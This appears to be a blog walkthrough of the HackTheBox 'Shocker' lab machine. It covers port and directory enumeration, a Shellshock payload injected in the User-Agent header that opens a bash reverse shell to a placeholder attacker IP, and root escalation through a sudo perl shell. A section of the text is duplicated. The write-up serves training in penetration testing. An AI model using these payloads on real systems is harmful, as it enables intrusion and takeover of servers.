> ## Documentation Index
> Fetch the complete documentation index at: https://blog.daehyung.dev/llms.txt
> Use this file to discover all available pages before exploring further.

# HackTheBox Shocker

> Linux machine walkthrough from enumeration to privilege escalation.

# Enumeration

## Run Nmap Scan

```bash theme={null}
nmap 10.10.10.56 -p- -sC -sV --min-rate 6000 -Pn -n -oA tcpDetailed

"
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-11 11:53 BST
Nmap scan report for 10.10.10.56
Host is up (2.8s latency).
Not shown: 63981 filtered tcp ports (no-response), 1553 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 372.27 seconds
"
```

## **View Website**

<img src="https://mintcdn.com/student-32fdab5f/ThHtqN7KMGaVNAP6/hackthebox-linux/images/shocker/untitled.png?fit=max&auto=format&n=ThHtqN7KMGaVNAP6&q=85&s=3e4451be0b91f3be7b05416e1a3d612c" alt="Untitled" width="1675" height="719" data-path="hackthebox-linux/images/shocker/untitled.png" />

## Directory Bruteforcing (Run Gobuster)

```bash theme={null}
gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirb/common.txt

"
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/09/11 12:01:23 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/cgi-bin/             (Status: 403) [Size: 294]
/index.html           (Status: 200) [Size: 137]
/server-status        (Status: 403) [Size: 299]
                                               
===============================================================
2023/09/11 12:02:44 Finished
===============================================================
"
```

`/CGI-BIN` is a technology that lets us execute a program to show a dynamic webpage. But it contains a vulnerability called **Shellshock**

### Finding cgi-bin script through additional bruteforcing

```bash theme={null}
gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x pl,sh,cgi -f

"
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              pl,sh,cgi
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
2023/09/11 12:11:06 Starting gobuster in directory enumeration mode
===============================================================
/user.sh              (Status: 200) [Size: 119]
Progress: 2056 / 350660 (0.59%)               ^C
[!] Keyboard interrupt detected, terminating.
                                               
===============================================================
2023/09/11 12:11:42 Finished
===============================================================
"
```

1 route is enough to exploit the shellshock vulnerability

`/CGI-BIN` is a technology that lets us execute a program to show a dynamic webpage. But it contains a vulnerability called **Shellshock**

### Finding cgi-bin script through additional bruteforcing

```bash theme={null}
gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x pl,sh,cgi -f

"
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              pl,sh,cgi
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
2023/09/11 12:11:06 Starting gobuster in directory enumeration mode
===============================================================
/user.sh              (Status: 200) [Size: 119]
Progress: 2056 / 350660 (0.59%)               ^C
[!] Keyboard interrupt detected, terminating.
                                               
===============================================================
2023/09/11 12:11:42 Finished
===============================================================
"
```

1 route is enough to exploit the shellshock vulnerability

# Exploitation

## Execute Burp Suite

After running burp suite route to the cgi-bin script route

<img src="https://mintcdn.com/student-32fdab5f/LWlODrLqTDWIzImb/hackthebox-linux/images/shocker/untitled-1.png?fit=max&auto=format&n=LWlODrLqTDWIzImb&q=85&s=f394830daa229a2538ebceb7375fe7b9" alt="Untitled" width="1679" height="864" data-path="hackthebox-linux/images/shocker/untitled-1.png" />

## Send the Proxy Result to the Repeater

<img src="https://mintcdn.com/student-32fdab5f/ThHtqN7KMGaVNAP6/hackthebox-linux/images/shocker/untitled-2.png?fit=max&auto=format&n=ThHtqN7KMGaVNAP6&q=85&s=4395eb17b1f2595c574c370f20d9e075" alt="Untitled" width="1680" height="865" data-path="hackthebox-linux/images/shocker/untitled-2.png" />

<img src="https://mintcdn.com/student-32fdab5f/ThHtqN7KMGaVNAP6/hackthebox-linux/images/shocker/untitled-3.png?fit=max&auto=format&n=ThHtqN7KMGaVNAP6&q=85&s=e365c0cb5baeddf24a03134ef356db38" alt="Untitled" width="1680" height="862" data-path="hackthebox-linux/images/shocker/untitled-3.png" />

## What to change?

Add this command after `User-Agent:`

```bash theme={null}
() { :; }; <command to execute>
```

## Listening Reverse Shell and Exploit

```bash theme={null}
nc -lvnp 4444
```

So I generated reverse shell code to execute at the victim side

```bash theme={null}
User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/<Attacker IP>/4444 0>&1
```

<img src="https://mintcdn.com/student-32fdab5f/ThHtqN7KMGaVNAP6/hackthebox-linux/images/shocker/untitled-4.png?fit=max&auto=format&n=ThHtqN7KMGaVNAP6&q=85&s=ef3ab70e0d050cf1702259361fcccb12" alt="Untitled" width="1680" height="861" data-path="hackthebox-linux/images/shocker/untitled-4.png" />

<img src="https://mintcdn.com/student-32fdab5f/ThHtqN7KMGaVNAP6/hackthebox-linux/images/shocker/untitled-5.png?fit=max&auto=format&n=ThHtqN7KMGaVNAP6&q=85&s=e26a29bc55b227f6c882b55fcf5b95a0" alt="Untitled" width="816" height="583" data-path="hackthebox-linux/images/shocker/untitled-5.png" />

# Privilege Escalation

Let’s check what user **shelly** can execute in root permission

```bash theme={null}
sudo -l

"
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
"
```

Here we can know that `/usr/bin/perl` can be executed in privileged mode without any password

We can use perl to get root shell through [GTFOBIN](https://gtfobins.github.io/)

```bash theme={null}
sudo perl -e 'exec "/bin/sh";

"
whoami
root
"
```
